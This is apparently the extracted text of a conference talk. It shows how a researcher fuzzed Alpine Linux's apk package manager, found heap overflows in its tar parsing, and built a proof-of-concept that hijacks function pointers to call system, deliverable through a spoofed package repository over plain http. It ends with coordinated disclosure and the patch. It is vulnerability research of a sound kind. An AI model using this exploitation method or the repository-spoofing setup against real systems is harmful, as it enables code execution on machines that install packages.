Exploiting Alpine Linux - Twistlock · Lightweight Linux distribution Alpine’s motto: Small, simple and secure Alpine docker image only 5 MB in size Security in mind The kernel

From vulnerability discovery to code execution

Exploiting Alpine LinuxBy Ariel Zelivansky, Security Researcher

What is Alpine Linux?

● Lightweight Linux distribution

● Alpine’s motto: Small, simple and secure

● Alpine docker image only 5 MB in size

● Security in mind

○ The kernel is patched with a port of grsecurity/PaX

○ Userspace binaries compiled as PIE, NX enabled, full RELRO,

with stack smashing protection

https://en.wikipedia.org/wiki/Buffer_overflow_protection

Who uses Alpine?

● Alpine has become widely popular for use with containers (10M+ pulls)

● Many Docker images are now based on Alpine

● Docker has officially stated their support of Alpine

Researching Alpine

● What does an alpine container consist of?

○ musl libc

○ busybox userspace binaries

○ apk-tools

● What do people do with Alpine containers?

○ Download more programs!

○ apk - Alpine’s package manager

Apk

● A tool to install, upgrade and delete packages (aka a package manager)

● Historically a collection of shell scripts, now written in C

● To add a package - apk update and apk add [name]

○ Or just apk add [name] -U/--update

● Can I somehow alter packages or convince apk to downgrade packages?

Apk

● Documentation first (Alpine’s wiki)

○ /etc/apk/repositories - list of local/remote repositories

○ By default with docker image - plain http

● Prone to MITM attack

● Fortunately, an attack is not so simple

○ Packages are signed

○ See /etc/apk/keys

● What about update?

○ “A repository is simply a directory with a collection of *.apk files. The directory must include a

special index file, named APKINDEX.tar.gz to be considered a repository.”

○ Update essentially downloads and parses the APKINDEX.tar.gz file

Apk

● Signature inside archive?

● Sounds like fuzzing time

○ What’s fuzzing?

○ american fuzzy lop (afl-fuzz)

■ Finds lots of bugs (and vulnerabilities) in open

source software project)

■ Compile with afl-gcc to instrument file

Apk

● Clone apk-tools from alpine’s git repository

● Empty README

● Relevant code seems likely to be in update.c

● main is in apk.c

● After inspecting the code for a while, it appears each action is defined as an applet

Apk

● Update.c doesn't seem to do anything

○ Actual code in database.c looks for

APK_UPDATE_CACHE flag

○ After briefly learning the code, I was ready to fuzz it

● Writing my own applet

○ Read data from file (fuzzer will provide)

○ Call apk_bstream_from_file to read the file

○ Call apk_db_index_read with the data

○ Define applet, add to Makefile

● Running afl inside docker container

○ Easy to setup and reproduce

Fuzzing Apk

● Fuzzer does nothing

● Tried fuzzing different other functions, tweaked the code to allow fuzzing

● Finally, decided on fuzzing apk_tar_parse

○ Looks promising

Fuzzing Apk

● Fuzzing very slow to my experience

● Diving into the code again

○ Removed anything that might slow down the fuzzer and I don’t need

○ init_openssl

○ apk_db_init / apk_db_open

● Fuzz time

Fuzzing Apk

● Multiple crashes

● Triaging crashes with crashwalk

○ Runs through all crashes and identify the crash type

○ Suggests if exploitable

○ My final summary results in 6 different crashes

Reproducing the crash

● So far I was only able to reach the crashes in my modified code

● To reproduce with the real apk, I used a crash as a bad tar.gz file

○ cat crash | gzip -9 > ~/docker/files/alpine/v3.6/main/x86_64/APKINDEX.tar.gz

○ Served the file from my local server

○ docker run -ti --add-host dl-cdn.alpinelinux.org:172.17.0.2 alpine:3.6

○ Upon running apk update, a segfault occurred!

● After a debugging session with gdb, I determined the origin of the crash

Explaining the bugs

● The result is two (similar) heap overflow vulnerabilities

● Let’s examine the relevant code (inside archive.c)

● Tar consists of blocks of 512 bytes, starting with a tar header block for each file

○ Reads tar stream in chunks, runs callback function on each chunk

● One of the fields of the header is a typeflag

○ One of its uses is to indicate special blocks, such as the “GNU long name extension”

○ This extension indicates the following block includes the name of the file (only 100 bytes

otherwise)

● How is this implemented?

Explaining the bugs

● Uses blob_realloc to allocate the buffer for the name

Explaining the bugs

● int is naturally signed

○ b->len is long, also signed

○ The comparison is signed

● Any integer bigger than the maximum of a signed integer (0x80000000)

will result in the buffer unmodified

Explaining the bugs

● The following call to is->read a huge amount of bytes will be copied to the buffer

○ AKA Heap overflow

○ As long as is->read accepts the size as unsigned

○ In the case of a tar.gz, is->read is gzi_read which accepts size_t (unsigned)

Explaining the bugs

● So to fix, make blob_realloc accept size_t!

○ Yes, but also make sure entry.size is not max int (because a +1 would overflow it)

● A similar bug occurred with a pax header block (another special block)

Developing an exploit

● I built a minimalistic tar file

○ To trigger the bug, I put a longname block with a

negative size

○ In tar size is an octal number in ASCII, I went with

0o77777777777 (-1 for a signed 32-bit integer)


● The execution crashed as expected

○ The crash was on the copy of a null-terminating zero meant for the entry.name buffer

○ entry.name was not allocated, so it pointed to null

○ entry.size was 0xffffffffffffffff (it was implicitly converted to 64-bit, it’s of type off_t)


● I created another file, with two blocks

○ First block to allocate the buffer with a size I want

○ Second buffer exploits the vulnerability with the allocated buffer

● Debugging the execution, it seems everything goes as expected

○ The buffer is allocated then overwritten

○ The code works to my advantage - is->read is gzip_read

■ gzip_read copies chunks from the source stream to the target and stop once

the source runs out!

■ No need to worry about the source’s size


● There are various known ways to exploit a heap overflow

○ Remember musl libc? Memory allocation (malloc, realloc) is done by it

○ I preferred not to research it

○ I can workaround an exploit using the code

■ Is there anything useful on the heap? A flag to change? Structs with callbacks?

■ I could simply change a callback address to execv or system

● Mitigations?

○ ASLR

○ For the sake of a proof-of-concept, ignoring ASLR


● Lots of trial and error, trying to find structs after entry.name I should overwrite

● I realized I can just use the is struct, which is used on is->read

● It is of type apk_istream

● I put a breakpoint on the call to is->read

● I calculated the delta between my buffer (entry.name) to the is struct


● I filled my tar file with 0x153a0 bytes, following 16 zero bytes

● It worked!

○ The execution crashed on 0x0000000000000000

● Next step - call system with a string I control


● is->read parameters?

○ is->read(is, entry.name, entry.size);

● Since the first parameter is itself, I could overwrite the first 8 bytes of it

with my shell string

○ The first 8 bytes are of get_meta which is not called in our context

○ I used “echo 1” as the string

○ It worked!

● New problems

○ Shell string limit is 8 bytes, too short

○ The next day I failed to reproduce the exploit

■ is->read seems to write the data in chunks, so it only writes 4 bytes and calls

is->read again (which is only partly modified)


● How would I find what’s after the is struct?

● I recover is in the file (copy the actual addresses)

● I added random bytes after it

● gis->bs pointer seems like a good choice

● It is of type apk_bstream


● gis->bs->read is used in the same manner as is->read

● It has 8 more bytes to use for the shell string (used for flags)

● I overwrote a pointer to the struct unlike is where I had overwritten the actual struct

● I put my data just 32 bytes before the is struct

○ I could put it anywhere I have control of

gis->bs->flags gis->bs->get_meta gis->bs->read gis->bs->close, is->get_meta….

overwritten to system


● It works!

Demonstration

Real attack vector

● Man-in-the-middle in an organization

○ Attacker gets code execution on any alpine

package install or update

○ Attacker gets code execution on building alpine

images

○ Signature did not help since it’s taken from inside

the tar

Final steps

● I’ve found a vulnerability, what next?

● Responsible/Coordinated disclosure

○ Estimate the impact, write a proof-of-concept if it makes sense

○ Contact the developers

■ Nearly always privately, you don’t want public disclosure

■ Work on a fix

○ Assign CVE IDs

■ Check for the correct CNA (CVE Numbering Authority)

■ Otherwise contact MITRE through their web form

○ Disclose the vulnerability online

■ For open source the oss-security mailing list is a good choice

Final steps

● The bugs I found affect all apk versions since 2.5.0_rc1

● I reached alpine’s developers on IRC

○ Discussed the issues with Timo Teräs in private emails

○ A patch was released very quickly and was pushed to apk-tools 2.7.2 and 2.6.9

■ All alpine versions from current to 3.2-stable include the fix

○ Besides fixing the bugs, Timo also implemented additional hardenings to restrict

attackers from creating a similar exploit

■ This is done by removing the use of function pointers that are saved on structs on the

heap

● I sent an advisory to oss-sec and wrote about the issue in the Twistlock’s blog

http://seclists.org/oss-sec/2017/q2/598

https://www.twistlock.com/2017/06/25/alpine-linux-pt-1-2/

Future ideas

● Fuzzing other parts of apk

● Fuzzing other alpine tools

● Fuzzing libfetch

Ariel [email protected]

@TwistlockLabs (new!)Blog: Twistlock.com/blog

Thank you!

Exploiting Alpine Linux - Twistlock · Lightweight Linux distribution Alpine’s motto: Small, simple and secure Alpine docker image only 5 MB in size Security in mind The kernel

Documents